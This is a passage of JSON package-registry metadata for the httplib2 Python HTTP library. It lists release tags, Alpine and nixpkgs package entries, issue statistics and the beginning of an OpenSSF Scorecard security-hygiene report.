id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T14:58:22.703Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":14.250941315178945,"stargazers_count":13.288534863528255,"forks_count":8.38083732870248,"average":8.98007837685242},"purl":"pkg:apk/alpine/py3-httplib2-pyc?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=edge","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-httplib2-pyc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-httplib2-pyc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-httplib2-pyc/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-httplib2-pyc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-httplib2-pyc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-httplib2-pyc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-httplib2-pyc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-httplib2-pyc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-httplib2-pyc/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":"fabian@affolter-engineering.ch","url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":426,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2023-04-20T05:37:27.372Z","updated_at":"2023-04-20T05:37:27.372Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-edge","url":"https://pkgs.alpinelinux.org/packages?branch=edge","ecosystem":"alpine","default":false,"packages_count":39959,"maintainers_count":905,"namespaces_count":3,"keywords_count":6584,"github":"alpinelinux","metadata":{"repos":["main","community","testing"],"funded_packages_count":2944},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.616Z","updated_at":"2026-08-25T05:06:28.429Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/namespaces"}},{"id":13295954,"name":"python310Packages.httplib2","ecosystem":"nixpkgs","description":"A comprehensive HTTP client library","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":["python"],"namespace":null,"versions_count":1,"first_release_published_at":"2026-02-02T06:27:10.937Z","latest_release_published_at":"2026-02-02T06:27:10.937Z","latest_release_number":"0.21.0","last_synced_at":"2026-03-08T09:47:21.861Z","created_at":"2026-02-02T06:27:09.376Z","updated_at":"2026-08-21T14:58:22.720Z","registry_url":"https://search.nixos.org/packages?channel=23.11\u0026query=python310Packages.httplib2","install_command":"nix-env -iA nixpkgs.python310Packages.httplib2","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-23.11/pkgs/development/python-modules/httplib2/default.nix#L77","metadata":{"nix_attribute":"python3.10-httplib2-0.21.0","position":"pkgs/development/python-modules/httplib2/default.nix:77","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin","i686-cygwin","x86_64-cygwin","x86_64-windows","i686-windows"],"broken":false,"insecure":false,"unfree":false,"outputs":["dist","out"],"upstream_ecosystem":"pypi","upstream_name":"httplib2","upstream_purl":"pkg:pypi/httplib2"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source 